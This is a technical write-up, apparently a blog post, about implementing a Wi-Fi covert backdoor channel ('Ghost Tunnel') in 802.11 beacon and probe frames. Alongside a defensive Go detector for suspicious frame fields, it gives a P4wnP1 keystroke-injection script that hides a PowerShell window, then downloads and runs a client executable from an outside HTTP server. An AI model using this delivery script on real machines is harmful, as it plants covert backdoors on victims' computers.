Ghost Tunnel Realization in Go

Ghost Tunnel is a covert backdoor transmission method that hides its payload in 802.11 Probe Request and Beacon frames. Because it works within the first 3 steps of connecting to an AP, it can transfer payload in isolated environments (physical access is needed first) and bypass firewalls. In P4wnP1 it is called WiFi Covert Channel.

To understand the principle better, I wrote a Go version.

Principle

To improve the user experience, our terminals send Probe Request frames to find nearby APs, and APs respond with Beacon frames showing they are ready for connection. This process is called active scanning.

In this process we can control the SSID field and the Vendor-Specific Information field, 32 bytes and 255 bytes respectively, which is enough for a payload.

So we can set up an evil AP that sniffs Probe Requests and sends back Beacon frames to control the target.
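A defender reading the principle above wants to know what such frames look like on the wire and how the two carrier fields can be spotted. The following Go program is an added example, not part of the original post or of the author's Ghost Tunnel code: it parses the information elements of a Beacon or Probe Request body (the tagged parameters after the fixed fields) and flags the two fields named above when they look like payload carriers rather than network advertisement, an SSID made of non-printable bytes or an unusually large Vendor Specific element. The sample frame bodies, the detection thresholds and the helper names are constructed for this example; in practice the same functions would run over frames captured from a monitor-mode interface, after the 24-byte 802.11 MAC header.

```go
package main

import (
	"encoding/binary"
	"fmt"
	"unicode"
	"unicode/utf8"
)

// ie is one 802.11 information element (tagged parameter) from a
// management frame body: a 1-byte element ID, a 1-byte length, then data.
type ie struct {
	ID   byte
	Data []byte
}

const (
	ieSSID           = 0         // SSID element ID (at most 32 bytes)
	ieSupportedRates = 1         // Supported Rates element ID
	ieVendorSpecific = 221       // Vendor Specific element ID (at most 255 bytes)
	beaconFixedLen   = 8 + 2 + 2 // timestamp, beacon interval, capability info

	// Constructed heuristic thresholds (assumptions; tune per environment).
	maxNonPrintableSSID = 0.25 // fraction of unprintable SSID text tolerated
	largeVendorIELen    = 200  // vendor elements this large are unusual in practice
)

// parseIEs walks the tagged-parameter section of a frame body. A truncated
// trailing element stops the walk; everything parsed before it is returned.
func parseIEs(tagged []byte) []ie {
	var out []ie
	for len(tagged) >= 2 {
		id, n := tagged[0], int(tagged[1])
		if len(tagged) < 2+n {
			break
		}
		out = append(out, ie{ID: id, Data: tagged[2 : 2+n]})
		tagged = tagged[2+n:]
	}
	return out
}

// beaconIEs skips the fixed fields of a Beacon frame body before parsing.
func beaconIEs(body []byte) []ie {
	if len(body) < beaconFixedLen {
		return nil
	}
	return parseIEs(body[beaconFixedLen:])
}

// probeRequestIEs parses a Probe Request body, which has no fixed fields.
func probeRequestIEs(body []byte) []ie { return parseIEs(body) }

// nonPrintableRatio is the fraction of an SSID that is not printable text.
// Invalid UTF-8 counts as entirely non-printable; an empty (hidden) SSID as clean.
func nonPrintableRatio(ssid []byte) float64 {
	if len(ssid) == 0 {
		return 0
	}
	if !utf8.Valid(ssid) {
		return 1
	}
	bad, total := 0, 0
	for _, r := range string(ssid) {
		total++
		if !unicode.IsPrint(r) {
			bad++
		}
	}
	return float64(bad) / float64(total)
}

// suspiciousIEs returns findings for the two fields the text identifies as
// payload carriers when their contents look like data, not advertisement.
func suspiciousIEs(ies []ie) []string {
	var findings []string
	for _, e := range ies {
		switch e.ID {
		case ieSSID:
			if r := nonPrintableRatio(e.Data); r > maxNonPrintableSSID {
				findings = append(findings, fmt.Sprintf("SSID: %d bytes, %.0f%% non-printable", len(e.Data), r*100))
			}
		case ieVendorSpecific:
			if len(e.Data) >= largeVendorIELen {
				findings = append(findings, fmt.Sprintf("Vendor Specific IE: %d bytes", len(e.Data)))
			}
		}
	}
	return findings
}

// buildBeacon assembles a Beacon frame body from constructed fields so the
// detector can be exercised offline without a capture.
func buildBeacon(ssid, vendor []byte) []byte {
	body := make([]byte, beaconFixedLen)
	binary.LittleEndian.PutUint16(body[8:], 100)     // beacon interval: 100 TU
	binary.LittleEndian.PutUint16(body[10:], 0x0411) // capability info (constructed)
	body = append(body, ieSSID, byte(len(ssid)))
	body = append(body, ssid...)
	body = append(body, ieSupportedRates, 4, 0x82, 0x84, 0x8b, 0x96)
	body = append(body, ieVendorSpecific, byte(len(vendor)))
	return append(body, vendor...)
}

// sampleBenignBeacon: readable SSID plus a small WMM-style vendor element.
func sampleBenignBeacon() []byte {
	vendor := append([]byte{0x00, 0x50, 0xf2, 0x02}, make([]byte, 20)...)
	return buildBeacon([]byte("HomeWiFi"), vendor)
}

// sampleCovertBeacon: 32 raw control bytes in the SSID and a full 255-byte
// vendor element, the two carrier fields at their limits (constructed data).
func sampleCovertBeacon() []byte {
	ssid, vendor := make([]byte, 32), make([]byte, 255)
	for i := range ssid {
		ssid[i] = byte(i)
	}
	for i := range vendor {
		vendor[i] = byte(0xff - i)
	}
	return buildBeacon(ssid, vendor)
}

func main() {
	fmt.Println("benign:", suspiciousIEs(beaconIEs(sampleBenignBeacon())))
	fmt.Println("covert:", suspiciousIEs(beaconIEs(sampleCovertBeacon())))
}
```

The heuristics are deliberately coarse: a hidden SSID (zero length) and the binary but short vendor elements that WMM or WPS legitimately add pass through, while the full-width fields the text relies on stand out. The same `suspiciousIEs` check applies to Probe Request bodies from clients via `probeRequestIEs`, which is where the client side of this channel would show up.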

Realization

Server

Just read the code; it is very easy to understand.

Client

Due to privilege restrictions, we cannot do the same thing on the client side as on the server side. But we have a better choice: the system's native WiFi API. On Windows, for example, we can directly call WlanGetNetworkBssList and WlanScan from user space.

In a real engagement, how to get the malware onto the client is a big concern (plugging in a USB disk and clicking to copy is too ugly…). Thanks to P4wnP1, we can use a HID attack, especially its hidDownAndExec script, to transfer our PowerShell payload at 32Kb/s!

For example, you can use a PowerShell script that writes the malware to a local exe from base64 and deletes it when it receives the quit command. But maybe the fastest way is to download client.exe from P4wnP1’s HTTP server, like this:

// Set the typing speed as fast as possible
function fast() {
    typingSpeed(0, 0);
}

// Open an interactive PowerShell console (host architecture)
function startPS() {
    press("GUI r");
    delay(500);
    type("powershell\n");
}

// Hide an already opened PowerShell console, but keep input focus so we can go on typing
function hidePS() {
    type('$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName("WindowsBase")).GetType("MS.Win32.UnsafeNativeMethods"))::SetWindowPos($hw,$i,0,0,100,100,16512)');
    press("ENTER");
}

layout('us');
fast();

startPS();
delay(1000);
//hidePS();
delay(500);
type("(New-Object System.Net.WebClient).DownloadFile('http://172.16.0.1:8000/gtclient.exe','gtclient.exe');.\\gtclient.exe");
delay(500);
press("ENTER");

Actually, memory injection is more graceful, but I have tried PowerSploit’s Invoke-ReflectivePEInjection script many times without success; maybe you could leave me a note.

Demo

From P4wnP1

From 360

From me